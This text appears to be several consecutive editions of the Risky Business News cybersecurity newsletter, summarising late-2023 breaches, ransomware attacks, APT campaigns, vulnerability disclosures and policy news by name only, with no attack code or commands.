EFF complains to the FTC: The EFF has filed a complaint with the FTC asking the agency to crack down on e-commerce portals like Amazon and AliExpress. The EFF says the two companies and others are still selling Android TV set-top boxes infected with malware—even after suchreports have been public for months. The EFF says it also notified CISA Director Jen Easterly of the issue since the backdoored devices represent a supply chain risk for the US consumer market.
Meta pushback: Meta is pushing against US lawmakers who are trying to make the company protect kids on its platform. The company is now pushing for legislation that would have app store makers verify the age of kids and require parental approval for the installation of dangerous apps. I mean, Meta is not innocent here, but they're not wrong either. [Additional coverage in the Washington Post/non-paywall]
New Titan security keys: Google launched two new Titan security key models that can store up to 250 unique passkeys. The new models will replace Google's current line-up of USB-A and USB-C Titan keys. Besides USB ports, both models will also support NFC connectivity. As part of the product launch, Google says it will also be providing 100,000 of its new Titan keys to high-risk users for free. This includes campaign workers, activists, and journalists.
New Google Titan security keys, USB-C and USB-A connectors
Government, politics, and policy
ASD ACSC annual report: Australia's Cyber Security Centre has published its annual Cyber Threat Report for the year. The report covers 1,100 cyber security incidents from Australian organizations. The ACSC says that of these, 127 were extortion-related incidents, with 118 involving ransomware. The report also highlights that one in five critical vulnerabilities was exploited within 48 hours. As for nation-state activity, foreign actors focused on critical infrastructure and intelligence collection, with a special focus on the AUKUS partnership on nuclear submarines and other advanced military capabilities.
EU rejects client-side CSAM scanning: A key committee in the European Parliament has voted against the EU's plan to force internet companies to scan user communications for child sexual abuse material (CSAM). In a smashing 52-2-1 vote, the Committee on Civil Liberties, Justice, and Home Affairs ruled against the introduction of client-side scanning and age verification mechanisms.
Russia blocks Shadowsocks protocol: Russian telecommunications watchdog Roskomnadzor has ordered internet service providers to block the Shadowsocks tunneling protocol. Shadowsocks is the latest internet protocol added to the country's VPN blocklist, which the agency silently started enforcing earlier this year. It is one of the 49 protocols Russia is currently attempting to block. The full blocklist leaked online last week after the Ministry of Transport sent a document about the ban to its subordinates. Other protocols included on the list include the likes of WireGuard, OpenVPN, IPSec, and IKEv2. [Additional coverage in The Moscow Times]
Harry Coker nomination: The Senate Homeland Security and Governmental Affairs Committee advanced the nomination of Harry Coker for the role of White House National Cyber Director. Coker's animation passed in a 9 to 6 vote. Coker is set to replace Chris Inglis, who left the post in February. [Additional coverage in The Record]
Biden campaign CISO: The Biden camp is looking for a CISO to help it safeguard the US President's re-election attempt. [Additional coverage in SecurityWeek]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ryan Mahoney, Product Director at Gigamon. The TLS 1.3 encryption standard makes passive network monitoring inside your network difficult without break-and-inspect contortions. But Gigamon has what they call a "precryption" solution!
Cybercrime and threat intel
Exit scam group: Blockchain investigator ZachXBT has found traces that a single threat actor has orchestrated exit scams at six different cryptocurrency projects. The group is believed to have stolen more than $16.2 million worth of crypto assets from early investors in their projects. So far, the group has been tied to rug pulls at the Lendora Protocol, Magnate, Solfire, Hash DAO, Kokomo, and Snowflake.
Phishing gang detained: Police from Czechia and Ukraine have detained members of a phishing gang believed to have stolen more than €8 million from victims. Four suspects were arrested in Czechia and six in Ukraine. According to Europol, the group operated from call centers in Ukraine and carried out vishing attacks, mainly targeting Czech victims. The group's tactics involved tricking victims into thinking they were hacked and moving funds to safe accounts controlled by the gang.
LockBit and CitrixBleed:CyFirma and security researcher Kevin Beaumont have published reports on LockBit and the group's exploitation of the CitrixBleed vulnerability.
KEV update: CISA has updated its KEV database with five new vulnerabilities that are currently being exploited in the wild. The list includes the three zero-days. The first is CVE-2023-36584, a Windows zero-day patched last month. The second and third are older bugs in Sophos firewalls and Oracle Fusion servers that have recently been spotted being abused in the wild.
PyPI campaign: DevSecOps company Checkmarx has discovered a threat actor who, for the past six months, has uploaded 27 malicious packages to the PyPI repository. Checkmarx says the packages typosquatted the names of legitimate libraries in order to trick developers into accidentally installing them. The libraries contained code meant to gain reboot persistence on infected hosts and collect and exfil user data to a Discord channel.
Chang Way: Bridewell security researcher Joshua Penny has published an analysis of Chang Way Technologies, a bulletproof hosting provider operating from Hong Kong. According to Penny, the service has hosted infrastructure for the BlackByte ransomware, the 404 traffic distribution system, multiple Android bankers, and initial access brokers.
SysAid attacks: Zscaler has published its own analysis of Clop's campaign targeting SysAid servers. The campaign started last week, and it's still ongoing.
FBI yearly warning: The FBI has published its yearly alert, advising consumers to be wary of scams ahead of the holiday shopping season.
Scattered Spider: Together with CISA, the FBI also released a security advisory with TTPs used by the Scattered Spider (Starfraud, UNC3944, Scatter Swine, Muddled Libra) group in recent intrusions. These include posing as IT tech support staff, MFA prompt-bombing, SIM swapping, and deploying the AlphV ransomware on hacked networks.
Threat reports:Avast, Chainguard, WithSecure, Guidepoint, Trellix, Wiz, and Sophos have published threat reports. The most interesting conclusion is Sophos' observation that dwell times are going down, in line with what Secureworks reported last month.
Malware technical reports
Rhysida ransomware: CISA and Fortinet have published write-ups on Rhysida, a new RaaS that launched back in May and has significantly ramped up operations.
Royal ransomware: CISA has updated its analysis of the Royal ransomware and added information about the gang's potential attempt to rebrand as Blacksuit.
Elevator: Lumen's Black Lotus Labs has discovered a new Linux malware strain named Elevator. The malware abuses the Berkeley Packet Filter (eBPF) to escalate privileges to kernel access on already compromised Linux servers and secure persistent access for the attacker.
SystemBC: One eSecurity researcher Aaron Jornet has published an analysis of SystemBC (Coroxy, DroxiDat), a proxy malware bot often also used as initial access by other cybercrime groups. Many of these groups include ransomware gangs, such as Cuba, Darkside, Conti, Ryuk, Avaddon, BlackBasta, 8Base, Rhisida, Vice Society, Maze, Egregor, Hive, and Play.
Sponsor Demo
Brought to you by Gigamon Precryption, a visibility solution for encrypted traffic across virtual machine (VM) or container workloads. Perform advanced threat detection, investigation, and response across the hybrid cloud infrastructure. To learn more, please visit gigamon.com/precryption
APTs, cyber-espionage, and info-ops
Raccoon Security: Censys has discovered that Russian company Raccoon Security is the cybersecurity arm of NTC Vulkan, a private firm contracted by the Russian Ministry of Defense to develop offensive cyber weapons. NTC Vulkan was sanctioned by both the US and the EU.
Sandworm: Security researcher Monty has put together a list of recent Sandworm TTPs.
BlueNoroff's macOS malware: South Korean security researcher Sakai has published an analysis of a new strain of macOS malware employed by North Korean hacking group BlueNoroff.
Zimbra zero-day attacks: Google's TAG security team has published additional details about a zero-day (CVE-2023-37580) in the Zimbra email server it saw exploited in the wild in June. While Google did not make a formal attribution, TAG researchers say the first attacks used an email-stealing tool used in the past by a Chinese APT group named TEMP_Heretic. Google says that once Zimbra patched the zero-day, another threat actor named Winter Vivern also started exploiting the bug in its operations. ESET previously classified Winter Wivern as a Belarus-aligned threat actor. All in all, Google TAG says it saw the Zimbra zero-day used across four separate campaigns targeting organizations in Greece, Moldova, Tunisia, Vietnam, and Pakistan.
Vulnerabilities, security research, and bug bounty
M365 misconfigurations: The research team at Reco has reminded the world that Microsoft has still not fixed one of its major issues—that when disabling a user account for an employee who left an organization, access tokens remain active. Org admins must manually trigger the "Sign out inactive users automatically" option in their backends.
Google Workspace abuse: Bitdefender has found a way to expand access from a single machine to an organization's Google Workspace environment. The method exploits the Google Credential Provider for Windows. Google was notified but declined to release a fix.
Reptar vulnerability: Intel has released security updates for all its CPU models to fix a vulnerability that can be abused to elevate privileges and crash systems. Named Reptar (CVE-2023-23583), the bug was discovered by Google security researcher Tavis Ormandy. The researcher says exploiting the bug puts the CPU in a so-called "glitch state" where normal operational rules are suspended, and attackers can perform actions they normally couldn't.
WP Fastest Cache vulnerability: Automattic's WPScan team has discovered a severe SQL injection vulnerability in the WP Fastest Cache plugin. The vulnerability can be used to hijack unpatched websites. WP Fastest Cache is one of the most popular WordPress plugin, installed on more than one million sites.
CrushFTP unauth RCE: Converge security researchers have discovered and helped patch an unauth RCE vulnerability in the CrushFTP file-transfer software. Tracked as CVE-2023-43177, the vulnerability was patched in August. More than 10,000 CrushFTP servers are currently available online, making this a huge attack surface that can be exploited.
ActiveMQ exploitation: Security firm VulnCheck has published a new method of exploiting an Apache ActiveMQ vulnerability tracked as CVE-2023-46604. The vulnerability has been exploited in the wild since mid-October to deploy the HelloKitty and TellYouThePass ransomware on unpatched servers. The new exploitation method allows threat actors to execute attacks from memory and remain undetected by security solutions. There are currently more than 11,000 internet-facing ActiveMQ servers.
Typos research: NCC Group division Fox-IT scanned the internet for typos in reserver HTTP responses and found that they are quite common.
"Our research concludes that typos alone are insufficient to identify malicious servers. Nevertheless, they retain potential as part of a broader detection framework."
VMWare auth bypass: VMWare says its Cloud Director Appliance is vulnerable to an authentication bypass vulnerability (CVE-2023-34060). The company says it's still working on a patch and has released temporary mitigations that can be used to safeguard appliances. The vulnerability has received a severity rating of 9.8/10.
Cisco security updates: Cisco has released or updated five security advisories for various products.
WhatsApp security audit: NCC Group has audited Auditable Key Directory (AKD), a library used by Meta for WhatsApp's cryptographic algorithms.
"The review was performed remotely by 3 consultants over a two-week period with a total of 20 person-days spent. The project concluded with a retest phase a few weeks after the original engagement that confirmed all findings were fixed."
StackOverflow leaks: According to a software developer named Matan H., there are thousands of API keys and tokens that have been accidentally posted on StackOverflow. Most have probably been revoked by now, but this shows a trend with programmers who still fail to sanitize their code when asking for help online.
Infosec industry
New tool—IISHelper: PwC UK has open-sourced an IDA Pro plugin named IISHelper to aid with the analysis of native IIS modules.
Clorox CISO departs after hack: Clorox chief information security officer Amy Bogac is departing her role in the aftermath of a ransomware attack that crippled the company's operations in August this year. Bogac served as the company's CISO for two and half years before she departed at the end of last week. In SEC filings, Clorox said it expects sales to drop by $356 million as a result of the incident. [Additional coverage in Bloomberg/non-paywall]
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about International Humanitarian Law, aka the Rules of War in cyberspace. These rules don't really make sense in cyberspace, but despite that, Tom and The Grugq think talking about them (and other norms of behavior) is still worthwhile.
This newsletter is brought to you by Gigamon. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Spotify:
Russian state-sponsored hackers have breached at least 22 Danish companies operating in the country's energy sector.
Denmark's CERT team for the critical infrastructure sector (SektorCERT) described the intrusions as the largest cyber-attack in the country's history.
In a report [Danish PDF, machine-translated English file] published over the weekend, SektorCERT tentatively attributed the attacks to Sandworm, a cyber unit inside Russia's military intelligence service GRU.
The intrusions happened throughout May and took place across multiple waves.
SektorCERT says the initial point of entry was Zyxel firewalls. The first wave of attacks exploited a vulnerability tracked as CVE-2023-28771, while the other waves used a combination of CVE-2023-33009 and CVE-2023-33010.
Zyxell released patches for the three bugs in June.
The hacked companies had to disconnect from the internet to investigate the hacks, but SektorCERT says there was no impact on their operations, and the attacks were most likely intended for reconnaissance and establishing persistence.
DR, the Danish Broadcasting Corporation, says the 22 hacked companies provide electricity and heat to around 100,000 Danes.
Ironically, the intrusions took place three days after Denmark's cybersecurity agency raised the country's cyberespionage threat level to VERY HIGH.
SektorCERT says it detected the intrusions through a network of sensors it has installed at electricity, heating, and water plants across Denmark.
Breaches, hacks, and security incidents
Tunstall cyber-attack: Dutch company Tunstall has advised customers to keep their phones at hand after a cyber-attack has disrupted its personal medical alarm system. The attack took place on Saturday and is still ongoing. Tunstall says the incident is blocking alarms from reaching its control room. Primarily used by the elderly, these are buttons that trigger alerts in the company's control room whenever a customer is facing a healthcare emergency.
ICBC ransomware incident: The LockBit ransomware group claims the US branch of the Industrial and Commercial Bank of China has paid its ransom after LockBit encrypted its systems at the end of last week, shutting down the Chinese bank's ability to honor transactions on the US market. [Additional coverage in BusinessTimes]
TSTT ransomware incident: The Telecommunications Services of Trinidad and Tobago, the largest telco in the country, has confirmed it got hacked by the RansomExx ransomware gang at the start of October.
Avito data leak: More than 2.7 million user records from Moroccan e-commerce service Avito have been dumped into the public domain. The data was stolen in a November 2022 security breach.
McLaren breach: US healthcare provider McLaren Health says hackers gained access to the private and health data of almost 2.2 million customers after the company suffered a ransomware attack in July. The alleged culprits are the AlphV (BlackCat) gang.
General tech and privacy
Chrome to remote third-party cookies: Google engineers have announced plans to deprecate and remove support for third-party cookies from the Chrome web browser. Third-party cookies will be removed for 1% of the Chrome userbase in Q1 2024, and a gradual phaseout will follow for all users in Q3. Google is removing third-party cookies after it shipped a stable version of its Privacy Sandbox technology this year.
WhatsApp usernames are coming: Meta is working on adding support for usernames on WhatsApp to replace its current system, where phone numbers serve as user identities. Rival instant messaging app Signal is also working on a similar system. Support for WhatsApp usernames is currently available in WhatsApp's Android beta.
.NET 8: Microsoft has released v8 of the .NET runtime.
TikTok denies promoting pro-Hamas content: Chinese social media company TikTok has put out a statement denying accusations that it is promoting Palestinian and pro-Hamas content.
Government, politics, and policy
FCC cybersecurity pilot: The Federal Communications Committee has proposed the creation of a pilot program for K-12 schools and libraries to learn the best ways to protect these organizations against cyber threats. The proposed pilot program will run for three years with a budget of up to $200 million.
CISA AI roadmap: CISA has released a roadmap for the secure development and implementation of artificial intelligence capabilities.
ENISA-UA agreement: The EU's cybersecurity agency ENISA has signed a cooperation agreement with Ukraine's SSSCIP focusing on information exchange and capacity building.
UK NCSC Annual Review: The UK NCSC has published its Annual Review, a report that looks forward to future risks and issues the UK may face next year. At the top are AI, the "epoch-defining challenge posed by China," and an increase in aggressivity from state-aligned cyber groups.
Separate internet for BRICS+ countries: Russian officials are working on a plan to create their own separate internet for all the BRICS+ countries. [Additional coverage in RIA Novosti]
Nepal bans TikTok: The Nepalese government has banned Chinese social media app TikTok. Officials say the app disrupts social harmony. The ban entered into effect this week, shortly after it was announced. Officials didn't provide details on what led to their decision. [Additional coverage in the AP]
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Ryan Mahoney, Product Director at Gigamon. The TLS 1.3 encryption standard makes passive network monitoring inside your network difficult without break-and-inspect contortions. But Gigamon has what they call a "precryption" solution!
Cybercrime and threat intel
FBI dismantles IPStorm botnet: US law enforcement dismantled the IPStorm botnet and detained the malware's creator. Identified as a Russian and Moldovan national named Sergei Makinin, the suspect has already pleaded guilty in the US to three hacking-related charges. He created the malware in 2019 and infected more than 23,000 Windows, Linux, macOS, and Android devices. Officials say Makinin made more than $550,000 by proxying web traffic through the infected devices. He sold access to his proxy botnet on the proxx.io and proxx.net portals.
Scattered Spider investigation: A Reuters investigation has found that the FBI is allegedly aware of the real-world identities of at least a dozen members of the Scattered Spider group. Cybersecurity executives told Reuters the FBI has been aware of this information for at least six months but has not made any arrests, even if some members are based in the US. The Scattered Spider group is responsible for recent breaches at the MGM and Caesars casino operators but has been active for more than two years. Security experts say most of the group's members are based in Western countries. [Additional coverage in Reuters/non-paywall]
Google sues malware devs: Google has sued a group of John Does for distributing malware disguised as its Bard AI tool.
Mirai story: Wired has published a 22,000-word story of how three teens started the Mirai botnet back in 2016. [Additional coverage in Wired/non-paywall]
Campaign targeting French gamers: Sekoia has discovered a malware campaign targeting French gaming influencers.
Oct 2023 ransomware stats: Ransomware gangs have listed 348 victims on dark web leak sites in the month of October, but 2023 is still on track to be the most prolific year for ransomware operators, according to cyber insurance provider Corvus.
Malware technical reports
OracleIV: A threat actor is targeting publicly exposed instances of the Docker Engine API to infect cloud infrastructure with a new malware strain named OracleIV. Cado Security says the malware is written in Python and contains functions for cryptomining and DDoS attacks.
Ddostf: South Korean security firm AhnLab has discovered Ddostf, a new DDoS malware strain being installed on MySQL database servers.
PikaBot: OALABS covers the recent resurgence of PikaBot activity.
C3RB3R ransomware: SentinelOne has published a report on the C3rb3r ransomware strain that has been recently deployed on hacked Atlassian Confluence servers via the CVE-2023-22518 vulnerability.
Medusa ransomware: NCC Group takes a deep dive into Medusa, a RaaS platform that's been around since June 2021.
Royal ransomware: CISA and the FBI have published a jointadvisory on the Royal ransomware. Officials say the gang targeted more than 350 victims across the world, with ransom demands totaling more than $275 million. Officials did not say how many victims paid and how much.
Sponsor Demo
Brought to you by Gigamon Precryption, a visibility solution for encrypted traffic across virtual machine (VM) or container workloads. Perform advanced threat detection, investigation, and response across the hybrid cloud infrastructure. To learn more, please visit gigamon.com/precryption
APTs, cyber-espionage, and info-ops
APT29 attacks on embassies: Hackers linked to Russia's Foreign Intelligence Service (SVR) have been observed abusing a recently patched WinRAR zero-day (CVE-2023-38831) in attacks targeting embassies across Europe. The attacks took place between April and October of 2023 and targeted embassies in Italy, Greece, Romania, and Azerbaijan. APT29 joins fellow Russian group APT28, which also exploited the same vulnerability in a campaign targeting Ukrainian organizations. APT28 is linked to Russia's military intelligence service, which would explain why they targeted Ukrainian entities only while APT29 targeted other countries.
Storm-0978 (RomCom): Palo Alto Networks has published a write-up detailing how the Storm-0978 (RomCom) group has been exploiting CVE-2023-36884, a zero-day in the Windows Search feature, in attacks against Ukrainian organizations. PAN says the zero-day was used in conjunction with CVE-2023-36584, a MotW bypass, via weaponized Office documents.
UAC-0050: Ukraine's CERT team is warning about a series of attacks against government agencies trying to install the Remcos RAT. The agency attributed the attacks to UAC-0050, a threat actor it's been tracking since 2020. Similar attacks were spotted in a February campaign as well.
TA402: Proofpoint researchers have published a breakdown of a phishing campaign carried out by TA402, a cyber-espionage group also known as Molerats or the Gaza Cybergang. The campaign lasted between July and October, targeted organizations in the MENA region, and used a malware strain named IronWind.
"Based on Proofpoint's tracking of this threat actor since 2020, TA402 remains a persistent and innovative threat actor that routinely retools its attack methods and malware in support of its cyber espionage mandate. Its ongoing use of geofencing and decoy documents continues to serve its detection evasion efforts. While TA402 is an intelligence collection focused threat actor with a specific interest in Middle Eastern and North African government entities, the group could find itself under direction to adjust its targeting or social engineering lures in reaction to the ongoing Israel-Hamas conflict."
Fire Demon Snake: Qihoo 360 has published a report on a new APT group it tracks as Fire Demon Snake (or APT-C-52). The company says the APT is most likely based in South Asia, began operations in 2021, and primarily targets Pakistani military personnel.
Chinese fake news sites in KR: South Korean spy agency NIS has identified a network of 38 websites posing as fake Korean news agencies. The sites published pro-Chinese and anti-US articles targeting Korean-speaking audiences. NIS says the sites were created and managed by two Chinese PR firms named Haimai and Haixun. The agency says a third unidentified company also tried to distribute fake news articles through a South Korean newswire service. NIS credited South Korean cybersecurity companies EST Security and SK Shieldus for discovering the network. [Additional coverage in S2W]
Vulnerabilities, security research, and bug bounty
CVE-2023-36036 - EoP in the Windows Cloud Files Mini Filter Driver
Juniper exploitation:CISA says that five Juniper bugs that were patched in August are now actively exploited in the wild to take over unpatched devices. Proof-of-concept code for the vulnerabilities has been available online since the end of August, shortly after the patches. Juniper says it detected attacks as early as the start of November.
Siemens disables Twitter feed: ICS equipment vendor Siemens has disabled its CERT feed on Twitter, citing the API price hikes.
PyPI security audit: The Python Package Index, also known as PyPI, has completed its first security audit. It was performed by security firm Trail of Bits. The audit found 29 vulnerabilities, including three major issues that could have allowed threat actors to pivot into internal infrastructure and hijack the service.
CacheWarp attack: A team of academics has discovered a vulnerability that can allow threat actors to run malicious code inside virtual machines hosted using the AMD Secure Encrypted Virtualization (SEV) platform. Named CacheWarp (CVE-2023-20592), the attack can be used to grant access and retrieve data from inside SEV-secured virtual machines. AMD has released patches for current CPUs that support the SEV platform. Older models remain vulnerable.
Create2 vulnerability: A threat actor has drained an estimated $60 million worth of crypto assets by exploiting a vulnerability in the Ethereum blockchain. The attacker exploited a bug in the Create2 function to bypass transaction security protections and add itself as the recipient. Discovered by ScamSniffer, the attacks impacted almost 100,000 wallets. ScamSniffer says the vulnerability has now also been integrated into wallet phishing operations.
Randstorm vulnerability: Blockchain security firm Unciphered has discovered a vulnerability in BitcoinJS, a popular JavaScript library used in many browser-based crypto-wallets. Named Randstorm, the vulnerability uses an insecure RNG algorithm to generate cryptographic keys needed to access web crypto wallets. Unciphered says the Randstorm bug can be abused to determine private keys generated by BitcoinJS. Unciphered told the Washington Post that up to $1 billion worth of crypto assets are currently stored in vulnerable wallets. Most use private keys generated between 2011 and 2015 when the bug was present in the library. A list of web wallets that use or used BitcoinJS is embedded below.
Infosec industry
New tool—Open Source Fortress: Canonical security engineer George-Andrei Iosif has released Open Source Fortress, a workshop containing theoretical and practical information about detecting vulnerabilities in codebases.
New tool—CVE Half-Day Watcher: AquaSec has open-sourced a tool named CVE Half-Day Watcher, designed to show risks around vulnerability disclosures on how some reports may lead to leaks and early exploitation.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about International Humanitarian Law, aka the Rules of War in cyberspace. These rules don't really make sense in cyberspace, but despite that, Tom and The Grugq think talking about them (and other norms of behavior) is still worthwhile.
This newsletter is brought to you by Gigamon. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
Malaysian police have dismantled Phishing-as-a-Service provider BulletProftLink and have detained eight suspects, including the platform's main administrator.
The service launched in 2015 and grew to become one of the largest on-demand phishing platforms known to date.
It operated like your regular SaaS platform—but for email phishing gangs. For a $2,000 monthly fee, the service would provide hosting for phishing sites and access to phishing kits, email templates, and tutorials.
According to a screenshot of the BulletProftLink dashboard captured by threat intel company Intel471 in April this year, the service had 8,138 registered users and was selling phishing templates to impersonate emails and login pages for 327 different brands.
Image: Intel471
Also known as BPL or Anthrax, the service exploded on the infosec scene in 2021 when Microsoft said it was seeing hundreds of thousands of phishing pages hosted through the platform's infrastructure.
In the fourth edition of its Cyber Signals report [PDF] in May this year, Microsoft said BulletProftLink had become one of the major infrastructure suppliers for BEC gangs across the world.
The service also recently integrated features to provide reverse proxy-based phishing capabilities needed to intercept some types of 2FA challenges and gain access to MFA-protected accounts.
In a press conference, the Royal Malaysia Police said it took down the service after receiving a tip from the FBI and the Australian Police Force in October. Eight suspects were subsequently detained in raids across the cities of Kuala Lumpur, Sabah, Selangor, and Perak.
While Malay officials did not release any of the names of the detained suspects, the site's administrator had been doxxed for more than three years. In a three-partseries in October 2020, security researcher Gabor Szathmari identified the BulletProftLink admin as Adrian Bin Katong, a man going online as AnthraxBP and who claimed on LinkedIn to be the CEO of a company named BPL Hosting.
At the time, Szathmari said Katong was flaunting a life of expensive cars, jewelry, and exotic trips—before going dark in the aftermath of the researcher's exposé.
Malay officials did not specify if they received an extradition request.
Poloniex crypto-heist: Cryptocurrency exchange Poloniex has lost $130 million worth of assets after hackers drained its hot wallet. Poloniex confirmed the hack, paused transactions, and promised to reimburse user losses. This is the exchange's second heist after also getting hacked in 2014. Poloniex's latest incident is currently ranked as the 14th-largest hack ever.
Raft crypto-heist: Decentralized finance (DeFi) platform Raft has lost $3.3 million worth of cryptocurrency after a hacker exploited a vulnerability in its platform. The company confirmed the hack on social media and paused the minting of its R stablecoin to investigate the incident. Wintermute head of research Igor Igamberdiev has a breakdown of the exploit. [Additional coverage in The Crypto Times]
Maine government joins MOVEit list: Officials from the US state of Maine have disclosed that the personal data of more than 1.3 million residents was stolen in a cyberattack at the end of May. The leak covers the personal information of almost all Maine residents. The data was stolen by the Clop cybercrime group as part of its attacks that targeted MOVEit file-sharing servers. Almost 2,600 companies across the world have been impacted by the MOVEit hacks, and the data of 70 million users was stolen in the intrusions.
Anonymous Sudan DDoS attacks: The Anonymous Sudan "hacktivist" group claims it was behind two DDoS attacks that took down the websites of Cloudflare and OpenAI. None of the companies confirmed, and this may be your run-of-the-mill media-whoring and attention-grabbing attempts from hacktivist groups.
Indian cyber attacks on Qatar: Indian hacktivist group Indian Cyber Force has carried out DDoS attacks, defacements, and hack-and-leak operations against Qatari websites. The attacks come days after a Qatari court sentenced eight former Indian Navy officers to death in a non-public case.
TDS supply chain attack: A threat actor has compromised the systems of Transaction Data Systems (TDS), a software company in the pharmaceutical sector, and has used its remote-access capabilities to pivot into the networks of its customers, according to security firm Huntress Labs.
Optus 2022 hack update: Australian ISP Optus has lost a legal attempt to keep secret a report related to its 2022 hack. The report is a forensic assessment compiled by consultancy firm Deloitte on the root causes of the company's breach that led to hackers getting access to the data of 10 million current and former customers. Optus argued the report was legal advice compiled for internal use. The judge shot down the company's argument because it mentioned the report to journalists, and the judge allowed it to be included in the legal discovery process. [Additional coverage in the Guardian] [h/t Ravi Nayyar]
Australian ports down after cyberattack: Port operator DP World Australia has suspended operations at multiple ports across after a cyber-attack crippled its IT systems. The company says it expects the outage to last for "a number of days." The port terminals in Sydney, Melbourne, Brisbane, and Fremantle are impacted. Ship movements are not affected, but trucks can't load or unload cargo in some of the affected ports. Australian officials say the government's cybersecurity agency is assisting the company's investigation. The incident is suspected of being yet another ransomware attack. [Additional coverage in ABC]
Allen & Overy ransomware attack: A ransomware attack has disrupted the activities of Allen & Overy, one of the largest law firms in the world. The company confirmed the incident after members of the Lockbit ransomware gang took credit for the attack. In a post on their dark web leak site, Lockbit has given the company two weeks to pay its ransom demand. [Additional coverage in Reuters]
Dragos ransomware claim: The AlphV (BlackCat) ransomware gang claims it breached the IT systems of cybersecurity firm Dragos through one of its third-party vendors. The gang has listed the company on its dark web leak site in an attempt to force the company to pay a ransom. If confirmed, this would be Dragos' second security breach this year after a similar incident in May. [h/t Dominic Alvieri]
General tech and privacy
Intel class-action lawsuit: Five plaintiffs have filed a class-action lawsuit against Intel, alleging the company sold faulty chips for years. The lawsuit revolves around the Downfall vulnerability disclosed in August this year. Plaintiffs say Intel knew about side-channel attacks since 2018 but continued to manufacture and sell "defective" chips vulnerable to these types of vulnerabilities. The lawsuit is seeking monetary damage of at least $10,000 per plaintiff. [Additional coverage in DarkReading]
Tutanota rebrand: Secure email provider Tutanota has rebranded as Tuta.
Windows Server 2012/R2 ESU: Microsoft is providing three years of paid security updates for Windows Server 2012/R2 versions to help enterprise customers phase out older systems. The Windows Server 2012 operating system reached End-of-Life last month on October 10. Companies that sign up for the extended support will receive security updates until October 13, 2026. Also known as ESU, this is the same type of paid extended support that Microsoft previously made available for Windows 7 users. Just like the Windows 7 ESU, the paid support is only available for enterprise customers—but not home users.
Government, politics, and policy
Russia moves to formally ban VPNs: Russian officials are preparing to formally ban the use of VPN services in the country. The move comes after Roskomnadzor has been testing blocks for various VPN protocols and services over the past year. Officials say a formal VPN block is needed for the safety of the Russian internet. [Additional coverage in RIA Novosti]
EYP spied on its own: In the print edition of its newspaper, Tovima journalists claim that Greece's EYP intelligence agency used the Predator spyware to spy on its own employees, even on high-ranking officers.
CISA funding support: A group of industry executives has urged Congress in an open letter to support CISA and not cut the agency's funding in next year's budget. The group warns that limiting CISA's budget will derail efforts to protect critical infrastructure and federal government networks, exposing America's sensitive networks to foreign adversaries and criminal groups. Signatories include the CEOs of Tenable, Palo Alto Networks, CrowdStrike, Trellix, and Forescout. [Additional coverage in CybersecurityDive]
NSA&CISA SBOM guidance: CISA, the NSA, and ODNI have published joint guidance on the proper way to consume and use SBOM files. The guide was developed together with organizations from the private sector as part of the Enduring Security Framework project. The guidance looks at SBOM formats, their use for risk scoring, and query and reporting procedures.
Sponsor section
In this Risky Business News sponsor interview Tom Uren talks to Ryan Mahoney, Product Director at Gigamon. The TLS 1.3 encryption standard makes passive network monitoring inside your network difficult without break and inspect contortions. But Gigamon has what they call a “precryption” solution!
Cybercrime and threat intel
Phobos ransomware affiliates charged in France: French authorities have indicted a Russian couple for working as affiliates for the Phobos ransomware gang. Officials say the couple has worked with Phobos since 2020 and has successfully extracted payments from more than 150 victims across the world. The suspects are a couple in their 30s from Sankt Petersburg, Russia. They were detained in Milan, Italy, at the end of September and extradited to France, where they were formally charged last week. [h/t Gabriel Thierry]
Myanmar scam centers update: More than 160 Thai nationals are being returned home after being rescued from Myanmar scam centers. The group was rescued following a joint Myanmarese and Chinese law enforcement operation at the start of September this year. The Thai nationals were taken to China, where they were triaged and are now being sent home. More than 1,000 workers were rescued this year from Myanmar scam centers. [Additional coverage in the Bangkok Post]
BEC gang detained in Dubai: Dubai police have lured a cybercrime group to the UAE and detained 43 of its members for their involvement in a BEC scheme. The group has been active since 2018 and stole more than $36 million from victims. UAE officials began tracking the gang after they received a complaint from a legal firm in Asia that lost $19 million. The group hacked the CEO's email from where they tricked the law firm's account managers into transferring funds to their own bank accounts. Officials say that besides the arrests, they also issued Interpol arrest warrants for 20 other suspects, including the gang's leader.
IOTAseed restitution: UK police are in the process of returning around £1.9 million worth of cryptocurrency that was stolen in January 2018 by a Dutch hacker. Named Wybo Wiersma, the individual operated iotaseed.io, a website that generated seed phrases for the IOTA cryptocurrency wallets. Wiersma stole around £9 million worth of IOTA cryptocurrency by using copies of the seed phrases generated by his site. He was detained in 2019 following a Europol investigation and in January this year to four and a half years in prison.
Youshe gang: Chinese security firm Antiy looks at Youshe, an offshoot of the SilverFox cybercrime syndicate, known primarily for targeting Chinese users with rootkits and stealers via SEO poisoning and malspam phishing.
TAC5279 group: Sophos looks at TAC5279, a ransomware affiliate group that appears to have recently switched from the Vice Society to the Rhysida RaaS. Sophos says this group overlaps with what Microsoft tracks as Vanilla Tempest (formerly DEV-0832).
Gafgyt activity: A SANS ISC report covers the efforts of a Gafgyt botnet trying to hijack Huawei home routers.
New GoTiS ransomware: Symantec has spotted a new ransomware strain named GoTiS, part of the Xorist family, being distributed in the wild. No technical details are out yet.
New npm malware: Seventy-one malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
Malware technical reports
Effluence backdoor: The security team at consulting firm AON has published an analysis of Effluence, a backdoor planted on Atlassian Confluence servers that have been exploited using the CVE-2023-22515 vulnerability. The zero-day was used by a suspected Chinese APT (Storm-0062) in limited attacks since mid-September. AON did not attribute the backdoor to any threat actor yet.
Cobalt Strike: NCC Group has published a report going into the depths of the Cobal Strike framework.
Ducktail: Kaspersky has a report on the Ducktail infostealer and one of its most recent campaigns.
Dragon Babu: Chinese security firm Tinder Labs looks at Dragon Babu, a Windows rootkit used in campaigns targeting Chinese users to hijack victim web traffic and redirect users to advertising sites.
C3rb3r ransomware:Qihoo 360 and Trend Micro have published reports on the C3rb3r ransomware strain that has been recently deployed on hacked Atlassian Confluence servers via the CVE-2023-22518 vulnerability.
